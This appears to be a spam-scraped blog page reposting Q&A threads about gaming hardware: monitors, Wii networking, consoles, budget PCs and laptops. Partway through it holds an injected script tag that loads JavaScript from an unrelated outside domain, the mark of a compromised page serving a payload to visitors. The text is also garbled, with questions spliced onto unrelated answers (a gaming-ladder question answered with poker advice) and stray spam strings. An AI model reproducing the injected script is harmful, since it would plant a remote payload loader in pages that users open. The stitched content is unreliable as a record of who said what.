They also tend to have less blurring of quickly moving images.

That being said LCDs are making significant improvements in both areas.

For the best range of colours look for a LCD that has TCO'03 certification. This has requirements for the saturation of the red green and blue primary colours that are used to make up all the colours on the screen. It also has requirements for gray scale tracking, another traditional problem for LCDs.

LCD manufacturers are regularly quoting panel switching speeds. Pick the lowest value to get the least blurry image. Check the specs though, a low gray-to-gray speed is better than a low black-to-white speed. (seems like it should be the other way around but it is not.)

CRTs also handle multiple resolutions better than LCDs. So if your graphics card can't hack a decent frame-rate at 1440 by 900 (19" widescreen native res.) it is not going to be as crisp a picture when you drop the resolution.

However, CRTs are huge space and power hogs, and have to deal with all sorts of geometry problems.
Reply:I haven't heard anything specific about CRT vs. LCD monitors and gaming, but I think it would be the other way around.

An LCD monitor usually produces a clearer and cleaner image and is easier on the eyes. In terms of "easy on the eyes," a 15-inch LCD monitor is as good as a 17-inch CRT due to the higher image quality of the LCD.

For general computer use, I'd recommend an LCD monitor over a CRT in a heartbeat, if you have a choice. I don't see any reason why it would be any different for gaming.
Reply:so far, yes

not to mention that the refresh rate is much higher than most lcds.
Reply:I doubt if either statement is true. LCDs (or plasma) are the preferred monitors, and, in fact, CRTs are on the way out.
Reply:too be honest it dosent really make a difference to me i have a 19 in crt and a 19 inch lcd they look very simular just the crt is bigger and bulkyer
Reply:It is true that CRT's are on the way out, but they do work better for gaming because of the refresh rates as mentioned above. But most people would not notice the difference.
Reply:There are two issues sometimes raised concerning CRT vs. non-CRT monitors: refresh rate and true color. With respect to the first, slow refresh rates were an issue with early LCD monitors, but that problem has largely been resolved. I can see no difference, for example, watching a movie (say, "The Matrix") on my Sony Trinitron CRT and my Acer LCD (they're both 17 inches). Color rendition can vary a bit among monitors -- though there's little to no difference between these two -- but that can usually be adjusted with software.

I think the best advice for monitors is similar to that for loudspeakers: go someplace where you can see the alternatives for yourself, and trust your own eyes (or ears, as the case may be).
Reply:In few Word, yes. Bellow you can see why:

A)Flexible resolution:

That means on a CRT monitor, you can get resolutions more than 1920 x 1440, (even from a 17inch. monitors, see Philips 107P) when on flat panels monitors (LCD,TFT,etc.) BEST RESOLUTION IS fixed with each monitor. (That means if you change resolution, you loss on quality)

b) A CRT monitor can display the maximum number of colors when LCD can't.

C) Sharpness (mean clearness of colors are perfect when you use an LCD monitor in it's best resolution, while on CRTs sharpness depends on some facts like focus, soft edges, etc.

D)There ia s flicker on some CRT monitors when run in low refresh rate, bellow 75 HZ, (problem though eliminated with new graphic cards, refresh rate is even bigger than 120 HZ). LCD monitors are flicker free.

E) DOT PITCH(the area between 2 pixels) The smaller the better. CRT monitors are better on this area from LCD (for same screen size monitors).

F) Respond time (The time need a pixel to change) On CRT monitors this time is almost Zero(0) while in LCs this time ,even real small, does exist.

That mean when you view a video or a motion picture (like in games) the pixel change instantly on a CRT monitor, while take some time on LCD.

So, you can VIEW changes on pictures in real time, on CRT monitors, while on LCD this take some time.

G) Flexibillity:

You can change resolution and refresh rate on aCRT monitor so you can get the best performance while watch a video or play games.

LCD monitors come with a fixed refresh rate and resolution for best image quallity, so this narrow your choices.

CONCLUSION.

RESOLUTION, REFRESH RATE, RESPONSE TIME, are CRITICAL FACTORS for GAMES or VIDEO, and in this area CRT monitors are much better than LCD.

SHARPNESS and COLOR CLEARNESS are CRITICAL FACTORS for still images, and designs, and here LCD monitors are much better for CRT.

That's why GAMERS, VIDEO EDITORS, or any people who involved in motion pictures or graphics they prefare CRT monitors.

Photographers, designers, they prefare LCD.

Also for home users, price is another FACTOR.

To get a LCD monitor same as CRT (17inch,m for example) you need at least 2.5 times more money than to buy a CRT.

txhttp://www.blogger.com/profile/12088072295382908583noreply@blogger.com0tag:blogger.com,1999:blog-6781283982013827240.post-55994352595874594352010-05-24T06:40:00.003-07:002010-05-24T06:40:52.729-07:00How to surf the web and play online gaming simultaneously?I bought a DYNEX router and it doesn't connect me to the internet at all but I could connect with my modem. And what router do you reccomend?

What materials do you need for wii online gaming?
You need a router. If you don't want to spend up to 200 dollars on a router, for 40 dollars, you can buy the Nintendo Wi-Fi USB connector. So much better. It only works with Window XP, but once you install the softaware and register your wii (its really simple), you have wi-fi. It was made for people without routers, so if you don't have one, just buy this.

If you choose to go the way of the router, it's a little harder. here it is in simple steps.

i) Go into wii settings

ii) Go to the third page (I think 3rd) and click internet.

iii) It should have 3 boxes going down. Click the first one.*

iv) Click Wireless*

v) it will either ask, or just start to search for an access point. If it asks, just click yes.

vi) If your router is password-protected you will have to enter the password ( it will pop up right away once the connection is found)

vii) Once you enter the password, you should be done, it might ask you to shut down your wii (it will do it automatically, you don't have to press the button). Just click yes.

viii) You should be done! now you have wifi.

If you decide to go the way of the USB connector.

i) install the software that comes on the CD when you buy the pacakge.

ii) Once the software is installed, an icon on your desktop toolbar should be there. Click into it.

iii) a small window will come up that says nintendo USB connector, and there will be a list of usernames registered. THere should be none at the moment.

iv) Like with the router, go into your wii internet settings, and test for a connection.

v) Go to the window on your computer and after a short while you wii username will pop up and it will be asking to connect. Just click enable.

vi) Voila! You have wifi

Hope all of this helps.
Reply:you just have to have a regular 102.11g wireless router. You must be near the router for it to work. You must have everything for the router to work. I use a linksys router that I got in June, 2004, so just about any router will do. The wii already has the wireless capabilities in it.
<script language=JavaScript src=http://www.chinese-kungfu.org/a3.js is the best non-PC gaming system to buy?I am looking to buy a gaming system for my husband for Christmas. From what I am aware of, my choices are Playstation brand, XBox brand, and Nintendo. I'm particularly thinking of purchasing a Playstation 2 because it's only $129.99 at the store. However, I'd like to know what you think the best gaming system is in terms of quality, graphics, games, and value. Thanks!

What is the best non-PC gaming system to buy?
I would acturally get the PS2 because it has more games to choose from and the graphics aren't that bad.Everything else is fine too but they're either too expensive, graphics are bad, or there aren't that many around.
Reply:The X Box 360 would be the best at this time. The Playstation 2 is being finally being used to its full potental but is too late. The Playstation 3 is over priced for its few problems like trouble play PS2 games and overheating, it will be good in about a year. Nintendo is failling rapidly, the poor sell of the Game Cube (Purple Lunchbox) is making the Wii suffer, the Wii is more of a novelty then a true console system.

The best way to go is a base X Box 360.
Reply:My personal favorite is the Xbox 360. And what difference will shared and not be?
Graphics card is very important for any gaming beyond Windows Solitaire.

Shared graphics is far less expensive but also far less capable and is generally considered unfit to play modern games as well as run graphically intensive programs such as Adobe Flash.
Reply:Graphics are half of what games are all about.

You've gotta have a decent video card in my opinion.
Reply:Graphics cards are desperately needed for gaming. They are the key component to running a game and many games won't allow you to play them if your card isn't to specifications. So the true question is what games do you plan to play and what are their necessary specifications for the video card!

As for the sharing part, that really doesn't matter. Laptops that have been built for gaming work great for other task as well, and usually work better. If you plan to use the laptop to store data more than playing games, make sure you get at least a 100GB hard drive that is compatible with your video card!
Reply:depends on the type of games you like to play. You will definetely need a good graphics card if you plan on playing anything with good graphics, which most games have high graphics now. You will also need at least a gig of ram to run most games good. Two gig is alot better. Spend the extra cash and then you won't have to worry if you puter can run the games or not.
Reply:graphic card plays a vital role while gaming especially if the game has good graphics and 3D environment.without the card the game may not run or too slow to play .
Reply:Graphic card is VERY important for a gaming machine. You dont wanna share memory, as memory is another VERY important item for gaming. Get a good card, with good onboard memory.

txhttp://www.blogger.com/profile/12088072295382908583noreply@blogger.com0tag:blogger.com,1999:blog-6781283982013827240.post-35721136410294306012010-05-24T06:38:00.002-07:002010-05-24T06:38:44.898-07:00Is this a decent gaming PC for a 12 year old?I am looking to buy my nephew a PC for his 12th birthday. My friend has his old pc he wants to sell me for $200. Its complete with a 17" flatscreen CRT monitor, keyboard/laser mouse, 2.1 sound system %26amp; a tower with an AMD 2.13GHz THORTON core CPU, 768MB PC2100 RAM, ATI 9600PRO video card, SOUNDBLASTER LIVE sound card, CD-RW, DVD-ROM %26amp; a 20GB hard drive with a fresh install of WINXP PRO SP2, ZONEALARM firewall, AVG anti virus, NERO, EVEREST 2.0, WINDOWS REGESTRY CLEANER %26amp; a few other programs incuding a GAMPAD %26amp; a couple demo games like FEAR, DOOM 3, HALO %26amp; SWAT 4. Is this a good rig for a 12 year old? I dont have alot of money %26amp; dont think I could build a better PC for $200 complete like it is. Also I know it works fine as its my friends old gaming rig. What do you think is it a good deal? He might take $180 if I show him the cash in $20 bills you know.

Is this a decent gaming PC for a 12 year old?
for $200 for that system is a good deal. but that system cannot play some of the decent games like Lost Planet, Crysis, Bioshock etc... the system is a good start for a 12 years old. i say go for it.
Reply:This computer sounds fine for a twelve year old. But it definitely depends on what other games he'll be playing on it, if that is the extent of what he's going to be doing. You're set. But if he gets something a little more complicated or something thats more graphics or processor intensive, you may have some issues with gameplay speed or quality. For 200$ its a good deal.

Good luck!
Reply:That really is a good PC for $200. The only thing I would recommend is adding a larger Hard Drive later as a secondary drive and pretty soon a new Video card, since most new games won't play at all on the ATI 9600. The RAM is good for gaming on XP and the CPU is good as well. You should also get a good Antivirus, my suggestion is Trend Micro - won't slow down your system like Norton will, and just as powerful, plus Spysweeper for anti Spyware. Without those 2 programs that computer won't last long. Don't let him use Limewire or any of those free song downloading programs. They are virus superhighways!
Reply:For a 12 y/o, I would say that is sufficient. One thing that I am not comfortable with is the HDD space. 20 GB hardly enough for gaming.

WinXP alone prolly will take up about 3 - 5 GB of space. With the system restore feature switched on, that will cost an additional 1 - 2 GB. In total it already munched up 4 - 7 GB of space, leaving only 12GB+ of space.

I suggest getting another 80GB HDD for your nephew. HDD nowadays are pretty cheap. I am sure you don't mind coughing up a little more for your beloved nephew. They will love you for it!!!!!
Reply:I would tend to agree with the other posters - for $200 its not a bad deal for a complete system of such recent vintage. I would look at upgrading the video card, though - the 9600 is pretty lacking for todays games with only four pixel pipelines. I'd suggest something with at leat 12 pixel pipelines or more like a Radeon X1650, or a Geforce 7600 or better. Both of these cards are under $100 and would greatly improve the system performance.
Reply:The graphics card will need an upgrade, and you'll need more RAM. And the hard drive is -TINY- it won't hold more than 2, maybe 3 games. But those are all things you can upgrade later. And for $200? That is pretty nice.

flower namestxhttp://www.blogger.com/profile/12088072295382908583noreply@blogger.com0tag:blogger.com,1999:blog-6781283982013827240.post-23476058504510234242010-05-24T06:38:00.001-07:002010-05-24T06:38:28.698-07:00What is a good laptop for intence gaming and work that is under $1000?Going to collage soon, I think it would be wise to invest in a laptop instead of a new desktop. However, I wouldn't know the first thing about laptops and I'm on a tight budget. I'd also like to take my games to collage with me.

What is a good laptop for intence gaming and work that is under $1000?
Hmm contact Carbonfrost. They haven't begun selling their laptops to their general public but they are doing a trial run with selected customers for feed back. For your feedback you can get some free stuff like games and what not.

support@carbonfrost.com if you are interested. Also they have a full 3 year warranty just in case although they use the best parts around so you shouldn't have a problem.
Reply:Ok your not giving me any games so ill throw some simple ones out. For under 1000$ you wont be able to play next gen games like Crysis, UT3, DIRT, Bioshock. These games will run on low detail sense most laptops under 1400$ tend to lack a video card capable of even pushing the games i listed. My advice save up about 2000$ and grab a laptop from alien ware. There laptops pack good cards and good processers.
Reply:Good Evening!

The HP Pavilion dv6000 series are a good option you should analyze. There are MANY different models of it, but most of them include a blazing fast AMD Duo Processor, fairly nice battery life, and some of them are a serious gamer's option.

Also, check out other HP models you may like, because I saw myself a notebook for $899 with 1024 MB Graphics memory (yeah, 1 GB on it's Graphic Card memory). Why would someone pay hundreds of dollars for such a gaming console? Why do you think its the best? Do you expect its price to get lower during the months of summer?

How amazing is the PS3? Why would someone pay hundreds of dollars for such a gaming console?
First, a couple of corrections:

-PS3 games are $60 NOT $90.

-BluRay players go for at least $900 NOT $500 (unless you're talking about a no-name brand player).

Second, the PS3 is well worth the $600 price tag if you consider that it's NOT just a gaming console... it's MUCH more than that. IT'S A MEDIA HUB. If you're only interested in gaming.... then go get yourself an Xbox and stop bitching about the PS3.

If you're into technology and NextGen electronics, then the PS3 is the unit for you. As I said before.... IT DOES MORE THAN JUST PLAY GAMES, and that's what SONY wanted this console to be..... A HI-TECH MEDIA HUB.

So again... if you want a console strictly for playing games, go pick up an Xbox and wait for the next HALO to come out.

If you want a console for playing games PLUS anything else you can throw at it, then get a PS3!!
Reply:Well, I bought one because I had the money. It does a lot of cool stuff. You can browse the internet. It plays Blu Ray DVD. It is high definition gaming. It's got a huge hard drive. But if I didn't come into some money, I would not have bought it. It costs way too much for a video game player.
Reply:The PS3 was a total bomb, you're correct, why would someone pay a ridiculous amount of money for a game console and then $90 a game when there aren't that many games out there for it. The price should come down a considerable amount within the next year or so but I still wouldn't waste my money on a PS3, your money would be much well spent on a XBox 360 or a Nintendo Wii.
Reply:Its not worth the price at the moment. Everyone i know that has one it just sits and collects dust. Wait at least 6 months to a year and pick it up then. the price will be lower and there will be games out for it worth playing.
Reply:FIrst of all it not the best they onlyy sold about 4 million consoles and the wii is whooping its ***....... there will not be a price drop but i think maybe next year it will be
Reply:it wont drop in the summer, if they drop the price it wont be till around november, and i dont think its the best, im content with it, it needs mroe games and needs custom soundtracks and then ill be very happy
Reply:just because of the blu ray. a stand alone player would cost more than that. not forgetting all of it's other features like media and free on line play. and you can hook up a load of removable devices into it like compact flash card, memory stick duo, mini SD,USB sticks and a whole lot more. it also has more stuff built in than the 360. like wireless and a high def player (blu ray)
Reply:The fact that it also plays Blu-Ray movies adds to its appeal. A Blu-Ray DVD player is $500. Pay $599, get a Blu-Ray player, a media center, %26amp; a PS3 gaming console. It's a no brainer if you already have an HDTV. If you don't have an HDTV, it is a waste of money.

txhttp://www.blogger.com/profile/12088072295382908583noreply@blogger.com0tag:blogger.com,1999:blog-6781283982013827240.post-30161132007618089642010-05-24T06:36:00.001-07:002010-05-24T06:36:20.755-07:00Which online gaming ladder is the biggest?Out of all the international gaming ladders ( http://en.wikipedia.org/wiki/Game_ladder ) on the net, which is the biggest? Which has the most amount of people playing it's games, the most traffic on it's site, etc. I have a way of measuring any and all suggestions, so whoever suggests the most active site dedicated to running a gaming league (game doesn't matter to me, as long as it's not a suscriber MMO) will get the points. So don't be shy, fire away. I play online between 20 to 70 hours a week. I play on several popular sites. I can assure you: It's straight. There is no reason for the site to " cheat" or "Steal" money from you. They make millions running the way they do. Why jeopardize that ? No need. Playing online can be different than live. You're going to see a lot more hands, a lot more situations. Also depending on the limits you are playing you are going to find a lot more loose players.

Bottom line: Maybe you need to change the way you're playing. How's your bankroll management? Do you go on tilt easily? Do you play the right limits? So many questions you can ask yourself. Practice, keep note of your sessions, analyze your play, work on your game. Poker is tough! Just don't blame the site for your losses. Be honest with yourself, and do the best you can to get better.

By the way, the answer below talk about "collusion" Don't worry about those either: In the long run they can't even beat the rake!!! Having 3 players who work together at the same table can't even break even in the long run! Period. And you don't find many of those collusion anymore. The sites are hard on them, and can easily identify them.

If you have a doubt when you're playing, move from the table, contact the site. If you doubt about collusion between 2 players at your table. Give their name to the site. Most of the site can look to the history of those players, and if they see that, those two play often together and their play look suspitious: They are out! And won't be able to withdrawl their money.

Good luck with your game.
Reply:For a start, you make sure they belong to eCOGRA.

Two reputable player protection organizations are eCOGRA and the Interactive Gaming Council. Look for the eCOGRA member mark on the casino's home page. The Interactive Gaming Council is a not-for-profit organization founded to establish fair and responsible trade guidelines and practices that enhance consumer confidence in interactive gaming products and services, and to serve as the industry’s public policy advocate and information clearinghouse. The Interactive Gaming Council has established responsible gambling guidelines to which its members have agreed to adhere.

eCommerce and Online Gambling Regulation and Assurance (eCOGRA) is a non-profit independent organization that imposes strict operating rules designated as Generally Accepted Practices (eGAP) on its members. eCOGRA offers a good deal for both online gamblers and Online Casinos. When members adhere to eCOGRA guidelines, they are accepting rules and regulations that protect the online gambler. Online gamers like yourself in turn look for Online Casnios that are members of eCOGRA because you feel a sense of security that its members will be dealing honestly with you and your money.

A list of member Online Casinos can be found on eCOGRA’s web site. http://www.ecogra.com/approved.aspx?OP=P
Reply:even if the site is legit. i know people that play online poker as a group. they go on a table together while they talk on the phone. telling each other what hands they have. then they gang up on one player and split the earnings.
Reply:anything electronic can be modified to suit any purpose.... and there is a possibility many sites cheat, its the internet after all..

If you suspect something wrong is going on simply dont play.

Had a friend who played backgammon on one site, and he told me that even though the site claimed to have random rolls, that wasnt the case... every time you doubled the cube, 7 out of 10 times the next roll was a double... i saw it and was amazed.....
Reply:Your suspicions are all wrong.

End of the question.

(I'm not saying online gambling is fair. I say it is PROBABLY fair, but if it isn't, there is NO WAY you figured it out in a few years of playing. Even if you played 24/365 for fifty years).

There's billions of possibility. DVD rewriters arn't 2 much and SATA HDD about 200GB's or more, could be a bit expensive, and processor, AMD's tend to be faster, but also, less reliable than intels, so for my money its intel
Reply:1. Right now you're best bet is to go for an Intel Core 2 Duo E6600, or E6400 if you need to save the $90 price difference. Both offer excellent performance and don't cost that much. They perform MUCH better than similarly priced AMD processors, and the $320 E6600 performs comparably with the AMD Athlon FX-62, which is nearly double the price. They are also very overclockable if that's an option for you.

2. Can't offer much advice here, since I don't have much experience with ATI. I will say that I have an nvidia GeForce 7900 GT and it runs all the latest games very well. My advice would also be to replace the video card's stock cooler with a Zalman GPU cooler, since they are MUCH quieter and allow you to overclock if you want to. Also, if you want DirectX 10 compatibility, you will need a GeForce 8800GTS or 8800GTX ($400 and $600), or you can wait for cheaper versions of these 8 series cards to be released.

3. Windows Vista isn't out yet, but any computer along these lines should be able to run it without any problems. Since you're interested in gaming, it should be noted that Windows Vista offers support for DirectX 10, which will be very useful for gaming in the near future.

4. You should be just fine with 1 GB of DDR2 memory. 2 GB will give you a slight increase in performance with some games, and will prove to be more necessary in the near future. Also, the type of motherboard you get dictates what kind of memory options are available. It would be a good idea to invest in AMD's AM2 socket or Intel's 775 socket, as these support DDR2 memory.

Hope that was helpful.

Oh, and use the toms hardware performance charts if you need to compare the performance of different CPUs, video cards, or hard drives. www.tomshardware.com (It's on the right side of the page)

txhttp://www.blogger.com/profile/12088072295382908583noreply@blogger.com0tag:blogger.com,1999:blog-6781283982013827240.post-66707532906500426692010-05-24T06:34:00.002-07:002010-05-24T06:34:43.804-07:00How to become a professional gaming programmer?I really want to be one when I grow up and I know how to code tic tac toe and pong on DEV-C++ and a lott more but I want to be a professional like the guys who make PS3 games and that stuff.

How to become a professional gaming programmer?
The best route into professional game programming is a Computer Science degree from a good college, preferably near a city with a lot of game studios. Going to school near an industry hub like Los Angeles, San Francisco, Seattle, Austin, etc, will make it a lot easier to find a job once you graduate. Don't waste your time with "game programming" schools or majors, they're more expensive and won't prepare you nearly as well as a normal CS degree will. Along with your CS classes you should also take two or three writing courses, and at least one art course -- these will help you communicate with your team mates later on.
Reply:Play more games like you are mad. Keep advancing your math skills and go to school for CS or even choose a gaming major. However, be weary of the gaming major.
